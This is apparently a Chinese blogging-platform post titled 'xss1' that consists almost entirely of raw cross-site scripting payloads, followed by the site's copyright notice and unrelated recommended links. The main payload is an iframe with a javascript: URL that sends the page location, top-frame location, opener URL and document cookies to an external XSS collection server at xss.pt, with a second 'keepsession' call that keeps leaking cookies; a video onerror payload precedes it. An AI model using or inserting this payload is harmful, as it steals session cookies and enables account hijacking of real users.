xss1

<video onerror=propt(1); style="text-align:center" width="100%" height="100%"

"autoplay" src="127.0.0.1" controls="true" ></video>

<iframe src="javascript:(function(){(new Image()).src='https://xss.pt/xss.php?do=api&id=7alp&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

if(''==1){keep=new Image();keep.src='https://xss.pt/xss.php?do=keepsession&id=7alp&url='+escape(document.location)+'&cookie='+escape(document.cookie)};"></iframe>

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • snapshot-1.0.0.js
    "use strict";function _classCallCheck(e,t){if(!(e instanc...
    久些阅读 6,154评论 0 2
  • 你想要的真实,在这里都有。
    北京2018年4月1日上午,NBA常规赛勇士客战国王的比赛中,发生了令人痛心不已的一幕。比赛进行到第三节还有41...
    Curry_宇阅读 4,996评论 1 1
  • 2018-07-30
    100个常用的javascript函数 1、原生JavaScript实现字符串长度截取 复制代码代码如下: fun...
    老头子_d0ec阅读 2,823评论 0 0
  • JS事件总结
    事件源对象 event.srcElement.tagName event.srcElement.type 捕获释放...
    孤魂草阅读 4,421评论 0 0
  • 推开不相关的人海 独缺你的时代 风华裁作留白 抖落一身尘埃 (穿过千街万巷 只为寻到你)
    小木阳阅读 1,625评论 0 5